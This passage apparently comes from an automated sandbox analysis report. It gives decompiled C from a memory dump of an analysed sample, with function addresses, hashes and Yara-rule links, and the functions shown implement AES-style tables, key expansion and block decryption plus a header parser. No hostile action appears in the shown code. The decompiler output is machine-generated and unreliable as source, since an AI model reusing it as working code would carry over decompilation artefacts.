				void* __edi;
				void* __esi;
				unsigned int _t204;
				signed int _t236;
				void* _t311;
				signed int* _t312;
				unsigned int _t342;
				intOrPtr* _t344;
				char* _t346;

				_t311 = __ebx;
				_t204 = _a8;
				_t346 = __ecx;
				if(_t204 > 0) {
					_t342 = _t204 >> 4;
					if( *__ecx == 0) {
						_v8 = __ecx + 8;
						E0041BB80(__ebx, _t342, __ecx,  &_v56, __ecx + 8, 0x10);
						_a8 = _t342;
						if(_t342 > 0) {
							_t344 = _a4;
							_push(_t311);
							_t312 = _a12;
							do {
								E0040C0D8( &_v24, _t344, ( *(_t346 + 4) << 4) + _t346 + 0x18);
								_v40 =  *(0x436698 + (_v24 & 0x000000ff) * 4) ^  *(0x436298 + (_v11 & 0x000000ff) * 4) ^  *(0x435e98 + (_v14 & 0x000000ff) * 4) ^  *(0x435a98 + (_v17 & 0x000000ff) * 4);
								_v36 =  *(0x436698 + (_v20 & 0x000000ff) * 4) ^  *(0x436298 + (_v23 & 0x000000ff) * 4) ^  *(0x435e98 + (_v10 & 0x000000ff) * 4) ^  *(0x435a98 + (_v13 & 0x000000ff) * 4);
								_v32 =  *(0x436698 + (_v16 & 0x000000ff) * 4) ^  *(0x436298 + (_v19 & 0x000000ff) * 4) ^  *(0x435e98 + (_v22 & 0x000000ff) * 4) ^  *(0x435a98 + (_v9 & 0x000000ff) * 4);
								_v28 =  *(0x436698 + (_v12 & 0x000000ff) * 4) ^  *(0x436298 + (_v15 & 0x000000ff) * 4) ^  *(0x435e98 + (_v18 & 0x000000ff) * 4) ^  *(0x435a98 + (_v21 & 0x000000ff) * 4);
								_t236 =  *(_t346 + 4) - 1;
								if(_t236 > 1) {
									_a12 = (_t236 << 4) + _t346 + 0x18;
									_a4 = _t236 - 1;
									do {
										E0040C0D8( &_v24,  &_v40, _a12);
										_v40 =  *(0x436698 + (_v24 & 0x000000ff) * 4) ^  *(0x436298 + (_v11 & 0x000000ff) * 4) ^  *(0x435e98 + (_v14 & 0x000000ff) * 4) ^  *(0x435a98 + (_v17 & 0x000000ff) * 4);
										_v36 =  *(0x436698 + (_v20 & 0x000000ff) * 4) ^  *(0x436298 + (_v23 & 0x000000ff) * 4) ^  *(0x435e98 + (_v10 & 0x000000ff) * 4) ^  *(0x435a98 + (_v13 & 0x000000ff) * 4);
										_a12 = _a12 - 0x10;
										_v32 =  *(0x436698 + (_v16 & 0x000000ff) * 4) ^  *(0x436298 + (_v19 & 0x000000ff) * 4) ^  *(0x435e98 + (_v22 & 0x000000ff) * 4) ^  *(0x435a98 + (_v9 & 0x000000ff) * 4);
										_t127 =  &_a4;
										 *_t127 = _a4 - 1;
										_v28 =  *(0x436698 + (_v12 & 0x000000ff) * 4) ^  *(0x436298 + (_v15 & 0x000000ff) * 4) ^  *(0x435e98 + (_v18 & 0x000000ff) * 4) ^  *(0x435a98 + (_v21 & 0x000000ff) * 4);
									} while ( *_t127 != 0);
								}
								E0040C0D8( &_v24,  &_v40, _t346 + 0x28);
								_v40 =  *((intOrPtr*)((_v24 & 0x000000ff) + 0x437ab8));
								_v39 =  *((intOrPtr*)((_v11 & 0x000000ff) + 0x437ab8));
								_v38 =  *((intOrPtr*)((_v14 & 0x000000ff) + 0x437ab8));
								_v37 =  *((intOrPtr*)((_v17 & 0x000000ff) + 0x437ab8));
								_t146 = (_v20 & 0x000000ff) + 0x437ab8; // 0x8239e37c
								_v36 =  *_t146;
								_v35 =  *((intOrPtr*)((_v23 & 0x000000ff) + 0x437ab8));
								_v34 =  *((intOrPtr*)((_v10 & 0x000000ff) + 0x437ab8));
								_v33 =  *((intOrPtr*)((_v13 & 0x000000ff) + 0x437ab8));
								_v32 =  *((intOrPtr*)((_v16 & 0x000000ff) + 0x437ab8));
								_v31 =  *((intOrPtr*)((_v19 & 0x000000ff) + 0x437ab8));
								_v30 =  *((intOrPtr*)((_v22 & 0x000000ff) + 0x437ab8));
								_v29 =  *((intOrPtr*)((_v9 & 0x000000ff) + 0x437ab8));
								_t170 = (_v12 & 0x000000ff) + 0x437ab8; // 0xd56a0952
								_v28 =  *_t170;
								_v27 =  *((intOrPtr*)((_v15 & 0x000000ff) + 0x437ab8));
								_v26 =  *((intOrPtr*)((_v18 & 0x000000ff) + 0x437ab8));
								_v25 =  *((intOrPtr*)((_v21 & 0x000000ff) + 0x437ab8));
								E0040C0D8( &_v40,  &_v40, _t346 + 0x18);
								if( *((char*)(_t346 + 1)) != 0) {
									E0040C0D8( &_v40,  &_v40,  &_v56);
								}
								_v56 =  *_t344;
								_v52 =  *((intOrPtr*)(_t344 + 4));
								_v48 =  *((intOrPtr*)(_t344 + 8));
								_v44 =  *((intOrPtr*)(_t344 + 0xc));
								 *_t312 = _v40;
								_t312[1] = _v36;
								_t312[2] = _v32;
								_t312[3] = _v28;
								_t344 = _t344 + 0x10;
								_t312 =  &(_t312[4]);
								_t200 =  &_a8;
								 *_t200 = _a8 - 1;
							} while ( *_t200 != 0);
							_pop(_t311);
						}
						_t204 = E0041BB80(_t311, _t342, _t346, _v8,  &_v56, 0x10);
					} else {
						_t204 = E0040C10A(__ecx, _a4, _t342, _a12);
					}
				}
				return _t204;
			}

0x0040c7c0
0x0040c7c3
0x0040c7ca
0x0040c7ce
0x0040c7db
0x0040c7dd
0x0040c7f6
0x0040c7fd
0x0040c805
0x0040c80a
0x0040c810
0x0040c813
0x0040c814
0x0040c817
0x0040c827
0x0040c85c
0x0040c88b
0x0040c8ba
0x0040c8e5
0x0040c8eb
0x0040c8ef
0x0040c8ff
0x0040c902
0x0040c905
0x0040c910
0x0040c945
0x0040c974
0x0040c9a3
0x0040c9a7
0x0040c9d2
0x0040c9d2
0x0040c9d5
0x0040c9d5
0x0040c905
0x0040c9ea
0x0040c9f9
0x0040ca06
0x0040ca13
0x0040ca20
0x0040ca27
0x0040ca2d
0x0040ca3a
0x0040ca47
0x0040ca54
0x0040ca61
0x0040ca6e
0x0040ca7b
0x0040ca88
0x0040ca8f
0x0040ca95
0x0040caa2
0x0040caaf
0x0040cabc
0x0040cac8
0x0040cad1
0x0040cadc
0x0040cadc
0x0040cae3
0x0040cae9
0x0040caef
0x0040caf5
0x0040cafb
0x0040cb00
0x0040cb06
0x0040cb0c
0x0040cb0f
0x0040cb12
0x0040cb15
0x0040cb15
0x0040cb15
0x0040cb1e
0x0040cb1e
0x0040cb28
0x0040c7df
0x0040c7e6
0x0040c7e6
0x0040cb30
0x0040cb33

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c15cb9a0a3cc649ff1b784b18560c516f4e274faeeea01f2b1d8114616a142fd
Instruction ID: add40d126d8feffd33f3b17901ac175d54afce09cc3d32c4af9e597194fb54ab
Opcode Fuzzy Hash: c15cb9a0a3cc649ff1b784b18560c516f4e274faeeea01f2b1d8114616a142fd
Instruction Fuzzy Hash: 79C140748081D99ECB11DFA5D4A08FEBFF4AE1A200F0955DAE9D4A7252C238D750EF74

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3F3, Relevance: .2, Instructions: 195
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0040C3F3() {
				signed char _v8;
				char _v521;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed char _t105;
				signed char _t106;
				char _t107;
				void* _t108;
				signed char _t119;
				signed int _t120;
				signed int _t129;
				signed char* _t155;
				signed int _t156;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t181;
				signed int _t182;
				void* _t183;

				_t107 = 0;
				_t98 = 1;
				do {
					 *(_t183 + _t107 - 0x304) = _t98;
					 *(_t183 + _t107 - 0x205) = _t98;
					 *((char*)(_t183 + _t98 - 0x104)) = _t107;
					_t107 = _t107 + 1;
					asm("sbb edx, edx");
					_t98 = _t98 ^  ~(_t98 & 0x00000080) & 0x0000011b ^ _t98 + _t98;
				} while (_t98 != 1);
				_t108 = 0;
				do {
					asm("sbb edx, edx");
					 *(_t108 + 0x437a98) = _t98;
					_t98 = _t98 + _t98 ^  ~(_t98 & 0x00000080) & 0x0000011b;
					_t108 = _t108 + 1;
				} while (_t108 < 0x1e);
				_t105 = 0;
				_v8 = 0;
				L6:
				L6:
				if(_t105 == 0) {
					_t100 = 0;
				} else {
					_t100 =  *( &_v521 - ( *(_t183 + (_t105 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
				}
				_t119 = (_t100 ^ (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) + (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100)) >> 0x00000008 ^ _t100 ^ (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) + (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) ^ 0x00000063;
				_t102 = _t105 * 4;
				_t16 = _t102 + 0x436a98; // 0x436a98
				_t155 = _t16;
				 *(_t105 + 0x437bb8) = _t119;
				_t155[1] = _t119;
				 *_t155 = _t119;
				 *(_t102 + 0x436e9b) = _t119;
				 *(_t102 + 0x436e98) = _t119;
				 *(_t102 + 0x43729b) = _t119;
				 *(_t102 + 0x43729a) = _t119;
				 *(_t102 + 0x43769a) = _t119;
				 *(_t102 + 0x437699) = _t119;
				if(_t119 == 0) {
					_t156 = 0;
				} else {
					_t156 =  *(_t183 + ( *(_t183 + (_t119 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
				}
				 *(_t102 + 0x436a9b) = _t156;
				 *(_t102 + 0x436e9a) = _t156;
				 *(_t102 + 0x437299) = _t156;
				 *(_t102 + 0x437698) = _t156;
				if(_t119 == 0) {
					_t120 = 0;
				} else {
					_t120 =  *(_t183 + ( *(_t183 + (_t119 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
				}
				 *(_t102 + 0x436a9a) = _t120;
				 *(_t102 + 0x436e99) = _t120;
				 *(_t102 + 0x437298) = _t120;
				 *(_t102 + 0x43769b) = _t120;
				_t181 = _t105 & 0x000000ff;
				if((((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) >> 0x00000008 ^ ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) ^ 0x00000005) == 0) {
					_t106 = 0;
				} else {
					_t106 =  *((intOrPtr*)( &_v521 - ( *(_t183 + (((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) >> 0x00000008 & 0x000000ff ^ ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
				}
				 *(_v8 + 0x437ab8) = _t106;
				if(_t106 == 0) {
					_t161 = 0;
				} else {
					_t161 =  *(_t183 + ( *(_t183 + (_t106 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
				}
				_t182 = _t106 & 0x000000ff;
				_t129 = _t182 << 2;
				 *(_t102 + 0x435a9a) = _t161;
				 *(_t102 + 0x435e99) = _t161;
				 *(_t102 + 0x436298) = _t161;
				 *(_t102 + 0x43669b) = _t161;
				 *(_t129 + 0x434a9a) = _t161;
				 *(_t129 + 0x434e99) = _t161;
				 *(_t129 + 0x435298) = _t161;
				 *(_t129 + 0x43569b) = _t161;
				if(_t106 == 0) {
					_t162 = 0;
				} else {
					_t162 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
				}
				 *(_t102 + 0x435a98) = _t162;
				 *(_t102 + 0x435e9b) = _t162;
				 *(_t102 + 0x43629a) = _t162;
				 *(_t102 + 0x436699) = _t162;
				 *(_t129 + 0x434a98) = _t162;
				 *(_t129 + 0x434e9b) = _t162;
				 *(_t129 + 0x43529a) = _t162;
				 *(_t129 + 0x435699) = _t162;
				if(_t106 == 0) {
					_t163 = 0;
				} else {
					_t163 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
				}
				 *(_t102 + 0x435a99) = _t163;
				 *(_t102 + 0x435e98) = _t163;
				 *(_t102 + 0x43629b) = _t163;
				 *(_t102 + 0x43669a) = _t163;
				 *(_t129 + 0x434a99) = _t163;
				 *(_t129 + 0x434e98) = _t163;
				 *(_t129 + 0x43529b) = _t163;
				 *(_t129 + 0x43569a) = _t163;
				if(_t106 == 0) {
					_t164 = 0;
				} else {
					_t164 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
				}
				_v8 = _v8 + 1;
				 *(_t102 + 0x435a9b) = _t164;
				 *(_t102 + 0x435e9a) = _t164;
				 *(_t102 + 0x436299) = _t164;
				 *(_t102 + 0x436698) = _t164;
				 *(_t129 + 0x434a9b) = _t164;
				 *(_t129 + 0x434e9a) = _t164;
				 *(_t129 + 0x435299) = _t164;
				 *(_t129 + 0x435698) = _t164;
				if(_v8 < 0x100) {
					goto L5;
				}
				return _t102;
				L5:
				_t105 = _v8;
				goto L6;
			}

0x0040c400
0x0040c402
0x0040c409
0x0040c411
0x0040c418
0x0040c41f
0x0040c426
0x0040c429
0x0040c432
0x0040c434
0x0040c439
0x0040c43c
0x0040c446
0x0040c448
0x0040c452
0x0040c454
0x0040c455
0x0040c45a
0x0040c45c
0x00000000
0x0040c464
0x0040c466
0x0040c480
0x0040c468
0x0040c47b
0x0040c47b
0x0040c49a
0x0040c49d
0x0040c4a4
0x0040c4a4
0x0040c4aa
0x0040c4b0
0x0040c4b3
0x0040c4b5
0x0040c4bb
0x0040c4c1
0x0040c4c7
0x0040c4cd
0x0040c4d3
0x0040c4d9
0x0040c4f0
0x0040c4db
0x0040c4e6
0x0040c4e6
0x0040c4f2
0x0040c4f8
0x0040c4fe
0x0040c504
0x0040c50c
0x0040c523
0x0040c50e
0x0040c519
0x0040c519
0x0040c525
0x0040c52b
0x0040c531
0x0040c537
0x0040c53d
0x0040c558
0x0040c58c
0x0040c55a
0x0040c588
0x0040c588
0x0040c591
0x0040c599
0x0040c5b0
0x0040c59b
0x0040c5a6
0x0040c5a6
0x0040c5b2
0x0040c5b7
0x0040c5ba
0x0040c5c0
0x0040c5c6
0x0040c5cc
0x0040c5d2
0x0040c5d8
0x0040c5de
0x0040c5e4
0x0040c5ec
0x0040c600
0x0040c5ee
0x0040c5f6
0x0040c5f6
0x0040c602
0x0040c608
0x0040c60e
0x0040c614
0x0040c61a
0x0040c620
0x0040c626
0x0040c62c
0x0040c634
0x0040c648
0x0040c636
0x0040c63e
0x0040c63e
0x0040c64a
0x0040c650
0x0040c656
0x0040c65c
0x0040c662
0x0040c668
0x0040c66e
0x0040c674
0x0040c67c
0x0040c690
0x0040c67e
0x0040c686
0x0040c686
0x0040c692
0x0040c69c
0x0040c6a2
0x0040c6a8
0x0040c6ae
0x0040c6b4
0x0040c6ba
0x0040c6c0
0x0040c6c6
0x0040c6cc
0x00000000
0x00000000
0x0040c6d5
0x0040c461
0x0040c461
0x00000000

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e64a79faf5233f14e83460e071e51bcdd91c9f992a628dba3502b6e29ad81e
Instruction ID: 250e314e69df2bff5ae831b4ad530f755a9bc69be02929d317c94be480140dce
Opcode Fuzzy Hash: c0e64a79faf5233f14e83460e071e51bcdd91c9f992a628dba3502b6e29ad81e
Instruction Fuzzy Hash: EE81D15220D2E58ED72AC77854EA5F63FD20F73104B2E91EE84CD5B2D3C0A9052ADB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C19C, Relevance: .2, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0040C19C(intOrPtr __ecx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int* _v12;
				signed char* _v16;
				signed char* _v20;
				signed char* _v24;
				signed char* _v28;
				char _v40;
				signed int _v41;
				signed int _v42;
				signed int _v43;
				signed int _v44;
				signed char _v45;
				signed char _v46;
				signed char _v47;
				signed char _v48;
				char _v56;
				signed int _v57;
				signed int _v58;
				signed int _v59;
				signed int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t102;
				signed int _t104;
				signed char _t108;
				signed int _t119;
				signed int* _t135;
				signed int* _t136;
				signed int _t137;
				char* _t138;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t143;
				void* _t145;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t151;
				void* _t157;

				_t141 = __ecx;
				_v8 = __ecx;
				_t119 =  *((intOrPtr*)(__ecx + 4)) - 6;
				E0041BB80(_t119, __ecx, _t147,  &_v60, _a4, 0x20);
				_t102 = 0;
				_t140 = 0;
				_a4 = 0;
				if(_t119 <= 0) {
					L9:
					if(_t140 <=  *((intOrPtr*)(_t141 + 4))) {
						_t104 = _t119 << 2;
						_v16 = _t157 + _t104 - 0x3b;
						_v20 = _t157 + _t104 - 0x3a;
						_v24 = _t157 + _t104 - 0x39;
						_v28 = _t157 + _t104 - 0x3c;
						_v12 = 0x437a98;
						do {
							_t108 = _v60 ^  *(( *_v16 & 0x000000ff) + 0x437bb8);
							_v60 = _t108;
							_v59 = _v59 ^  *(( *_v20 & 0x000000ff) + 0x437bb8);
							_v58 = _v58 ^  *(( *_v24 & 0x000000ff) + 0x437bb8);
							_v57 = _v57 ^  *(( *_v28 & 0x000000ff) + 0x437bb8);
							_t102 = _t108 ^  *_v12;
							_v12 =  &(_v12[0]);
							_v60 = _t102;
							if(_t119 == 8) {
								_t135 =  &_v56;
								_t142 = 3;
								do {
									_t148 = 4;
									do {
										 *_t135 =  *_t135 ^  *(_t135 - 4);
										_t135 =  &(_t135[0]);
										_t148 = _t148 - 1;
									} while (_t148 != 0);
									_t142 = _t142 - 1;
								} while (_t142 != 0);
								_v44 = _v44 ^  *((_v48 & 0x000000ff) + 0x437bb8);
								_v43 = _v43 ^  *((_v47 & 0x000000ff) + 0x437bb8);
								_v42 = _v42 ^  *((_v46 & 0x000000ff) + 0x437bb8);
								_v41 = _v41 ^  *((_v45 & 0x000000ff) + 0x437bb8);
								_t136 =  &_v40;
								_t143 = 3;
								do {
									_t149 = 4;
									do {
										_t102 =  *((intOrPtr*)(_t136 - 4));
										 *_t136 =  *_t136 ^ _t102;
										_t136 =  &(_t136[0]);
										_t149 = _t149 - 1;
									} while (_t149 != 0);
									_t143 = _t143 - 1;
								} while (_t143 != 0);
								goto L26;
							} else {
								if(_t119 > 1) {
									_t138 =  &_v56;
									_t145 = _t119 - 1;
									do {
										_t151 = 0;
										do {
											_t102 =  *((intOrPtr*)(_t138 + _t151 - 4));
											 *(_t138 + _t151) =  *(_t138 + _t151) ^ _t102;
											_t151 = _t151 + 1;
										} while (_t151 < 4);
										_t138 = _t138 + 4;
										_t145 = _t145 - 1;
									} while (_t145 != 0);
									L26:
									_t141 = _v8;
								}
							}
							_t137 = 0;
							if(_t119 <= 0) {
								goto L36;
							} else {
								while(_t140 <=  *((intOrPtr*)(_t141 + 4))) {
									if(_t137 < _t119) {
										_t102 = _t157 + _t137 * 4 - 0x38;
										while(_a4 < 4) {
											_t137 = _t137 + 1;
											_t102 = _t102 + 4;
											_a4 = _a4 + 1;
											asm("movsd");
											_t141 = _v8;
											if(_t137 < _t119) {
												continue;
											}
											goto L33;
										}
									}
									L33:
									if(_a4 == 4) {
										_t140 = _t140 + 1;
										_a4 = _a4 & 0x00000000;
									}
									if(_t137 < _t119) {
										continue;
									} else {
										goto L36;
									}
									goto L37;
								}
							}
							goto L37;
							L36:
						} while (_t140 <=  *((intOrPtr*)(_t141 + 4)));
					}
				} else {
					while(_t140 <=  *((intOrPtr*)(_t141 + 4))) {
						if(_t102 < _t119) {
							_t139 = _t157 + _t102 * 4 - 0x38;
							while(_a4 < 4) {
								_t102 = _t102 + 1;
								_t139 = _t139 + 4;
								_a4 = _a4 + 1;
								asm("movsd");
								_t141 = _v8;
								if(_t102 < _t119) {
									continue;
								}
								goto L6;
							}
						}
						L6:
						if(_a4 == 4) {
							_t140 = _t140 + 1;
							_a4 = _a4 & 0x00000000;
						}
						if(_t102 < _t119) {
							continue;
						} else {
							goto L9;
						}
						goto L37;
					}
				}
				L37:
				return _t102;
			}

0x0040c1aa
0x0040c1b3
0x0040c1b6
0x0040c1b9
0x0040c1be
0x0040c1c3
0x0040c1c7
0x0040c1ca
0x0040c20c
0x0040c20f
0x0040c217
0x0040c21e
0x0040c225
0x0040c230
0x0040c233
0x0040c236
0x0040c23d
0x0040c246
0x0040c24f
0x0040c25b
0x0040c26a
0x0040c279
0x0040c27f
0x0040c281
0x0040c284
0x0040c28a
0x0040c2b0
0x0040c2b3
0x0040c2b4
0x0040c2b6
0x0040c2b7
0x0040c2ba
0x0040c2bc
0x0040c2bd
0x0040c2bd
0x0040c2c0
0x0040c2c0
0x0040c2cd
0x0040c2da
0x0040c2e7
0x0040c2f4
0x0040c2f9
0x0040c2fc
0x0040c2fd
0x0040c2ff
0x0040c300
0x0040c300
0x0040c303
0x0040c305
0x0040c306
0x0040c306
0x0040c309
0x0040c309
0x00000000
0x0040c28c
0x0040c28f
0x0040c291
0x0040c294
0x0040c297
0x0040c297
0x0040c299
0x0040c299
0x0040c29d
0x0040c2a0
0x0040c2a1
0x0040c2a6
0x0040c2a9
0x0040c2a9
0x0040c30c
0x0040c30c
0x0040c30c
0x0040c28f
0x0040c30f
0x0040c313
0x00000000
0x00000000
0x0040c315
0x0040c31c
0x0040c31e
0x0040c322
0x0040c333
0x0040c334
0x0040c337
0x0040c33c
0x0040c33d
0x0040c340
0x00000000
0x00000000
0x00000000
0x0040c340
0x0040c322
0x0040c342
0x0040c346
0x0040c348
0x0040c349
0x0040c349
0x0040c34f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c34f
0x0040c315
0x00000000
0x0040c351
0x0040c351
0x0040c23d
0x00000000
0x0040c1cc
0x0040c1d7
0x0040c1d9
0x0040c1dd
0x0040c1ee
0x0040c1ef
0x0040c1f2
0x0040c1f7
0x0040c1f8
0x0040c1fb
0x00000000
0x00000000
0x00000000
0x0040c1fb
0x0040c1dd
0x0040c1fd
0x0040c201
0x0040c203
0x0040c204
0x0040c204
0x0040c20a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c20a
0x0040c1cc
0x0040c35e
0x0040c35e

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fddbd5abf178689f20d36b0bcfd4f90fca9642172b13df1bcd09f0c98412ec70
Instruction ID: 984aaffefb3ff040b40bf078471702d16ab0ba6cc88e1d00b61bfea2503f5bef
Opcode Fuzzy Hash: fddbd5abf178689f20d36b0bcfd4f90fca9642172b13df1bcd09f0c98412ec70
Instruction Fuzzy Hash: 3151E3718041889ACF11CFA4D0D01FDBFB0AF5A324F6941AFD8957B282C2356686DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00414050, Relevance: .1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00414050(void* __ebx, intOrPtr __ecx, signed int* _a4, char _a7, signed int* _a8, signed char _a11) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _t40;
				signed int _t41;
				signed int _t47;
				intOrPtr _t48;
				unsigned int _t49;
				signed int _t53;
				void* _t57;
				void* _t58;
				signed char _t60;
				void* _t64;
				unsigned char _t75;
				intOrPtr _t87;
				signed int* _t91;
				signed int* _t92;
				signed int _t93;
				intOrPtr _t94;

				_t58 = __ebx;
				_t92 = _a4;
				_t91 = _a8;
				_t91[3] = _t91[3] & 0x00000000;
				_v16 = __ecx;
				if(_t92[2] != 0 ||  *_t92 <=  *((intOrPtr*)(__ecx + 0x78)) - 7) {
					L3:
					_push(_t58);
					E00409527(_t92,  ~(_t92[1]) & 0x00000007);
					_t60 = E0040953E(_t92) >> 8;
					_a11 = _t60;
					E00409527(_t92, 8);
					_t40 = _t60 & 0x000000ff;
					_t64 = (_t40 >> 0x00000003 & 0x00000003) + 1;
					if(_t64 == 4) {
						L9:
						_t41 = 0;
						L13:
						return _t41;
					}
					_t10 = _t64 + 2; // 0x2
					_t91[3] = _t10;
					_t91[1] = (_t40 & 0x00000007) + 1;
					_a7 = E0040953E(_t92) >> 8;
					E00409527(_t92, 8);
					_t47 = 0;
					_v12 = 0;
					if(_t64 <= 0) {
						L8:
						_t75 = _a11;
						 *_t91 = _t47;
						if((_t47 >> 0x00000010 ^ _t47 >> 0x00000008 ^ _t47 ^ _t75 ^ 0x0000005a) == _a7) {
							_t93 =  *_t92;
							_t87 = _t93 + _t47 - 1;
							_t48 = _v16;
							_t91[2] = _t93;
							_t94 =  *((intOrPtr*)(_t48 + 0x7c));
							if(_t94 < _t87) {
								_t87 = _t94;
							}
							 *((intOrPtr*)(_t48 + 0x7c)) = _t87;
							_t41 = 1;
							_t91[4] = _t75 >> 0x00000006 & 0x00000001;
							_t91[4] = _t75 >> 7;
							goto L13;
						}
						goto L9;
					}
					_v8 = 0;
					do {
						_t49 = E0040953E(_t92);
						_v8 = _v8 + 8;
						_v12 = _v12 + (_t49 >> 8 << _v8);
						_t53 = _t92[1] + 8;
						 *_t92 =  *_t92 + (_t53 >> 3);
						_t64 = _t64 - 1;
						_t92[1] = _t53 & 0x00000007;
					} while (_t64 != 0);
					_t47 = _v12;
					goto L8;
				}
				_t57 = E00411F1D(__ebx, __ecx);
				if(_t57 != 0) {
					goto L3;
				}
				return _t57;
			}

0x00414050
0x00414057
0x0041405b
0x0041405e
0x00414066
0x00414069
0x00414082
0x00414087
0x0041408e
0x0041409c
0x004140a3
0x004140a6
0x004140ab
0x004140b6
0x004140ba
0x00414137
0x00414137
0x00414165
0x00000000
0x00414165
0x004140bc
0x004140c2
0x004140c8
0x004140d7
0x004140da
0x004140df
0x004140e1
0x004140e6
0x0041411a
0x00414126
0x00414130
0x00414135
0x0041413b
0x0041413d
0x00414141
0x00414144
0x00414147
0x0041414c
0x0041414e
0x0041414e
0x00414150
0x00414158
0x0041415f
0x00414162
0x00000000
0x00414162
0x00000000
0x00414135
0x004140e8
0x004140eb
0x004140ed
0x004140f5
0x004140fe
0x00414104
0x0041410c
0x00414111
0x00414112
0x00414112
0x00414117
0x00000000
0x00414117
0x00414075
0x0041407c
0x00000000
0x00000000
0x00414169

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88a1f865d29489f315af7efb3627804e695ef34aa47385da0c76d34f709fbc0a
Instruction ID: c1a06212955121c688654a0fef6e90001b2e5d982731c3fb34346285fc2c53da
Opcode Fuzzy Hash: 88a1f865d29489f315af7efb3627804e695ef34aa47385da0c76d34f709fbc0a
Instruction Fuzzy Hash: 7B310772600605BBCB04DF39C8852DEBBE1EB95318F10C15ED4A5DB382D379E985CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00405595, Relevance: .1, Instructions: 73
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00405595(unsigned int _a4, signed char _a8, unsigned int _a12) {
				signed char _t30;
				signed char _t32;
				signed char _t52;
				signed char _t57;
				unsigned int _t72;

